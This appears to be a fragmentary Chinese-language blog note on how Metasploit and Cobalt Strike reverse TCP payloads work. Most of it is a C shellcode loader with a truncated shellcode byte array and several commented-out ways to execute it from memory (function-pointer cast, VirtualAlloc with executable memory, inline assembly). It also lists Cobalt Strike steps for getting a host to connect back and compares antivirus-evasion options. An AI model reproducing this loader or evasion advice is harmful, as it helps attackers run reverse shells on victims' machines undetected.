看个热闹吧...
metasploit payload运行原理浅析(sockedi调用约定是什么)
lib/msf/core/payload/windows/reverse_tcp.rb:
原生态:
MSF:
#include <Windows.h>
#include <stdio.h>
#include <string.h>
//#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
.
.
.
.
\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";
int main()
{
//四种模式,随机选一种.(都GG)
((void(WINAPI*)(void))&buf)();
//char* Memory;
//Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//memcpy(Memory, buf, sizeof(buf));
//((void(*)())Memory)();
//__asm {
//lea eax,buf
//call eax
//}
//__asm{
//mov eax, offset shellcode
//_emit 0xFF
//_emit 0xE0
//}
}
CS:
cs--创建监听器--生成c的payload--替换payload--编译执行--上线
什么原理?
shellcode生成
msf cs
利用C/C++编译shellcode形成exe上线
shellcode:免杀手段繁多--搞坏的可能性小--自定义更多选择
可执行文件:免杀手段单一--搞坏的可能性大
MSF 源码地址reverse_tcp.rb
源码shellcode上线逻辑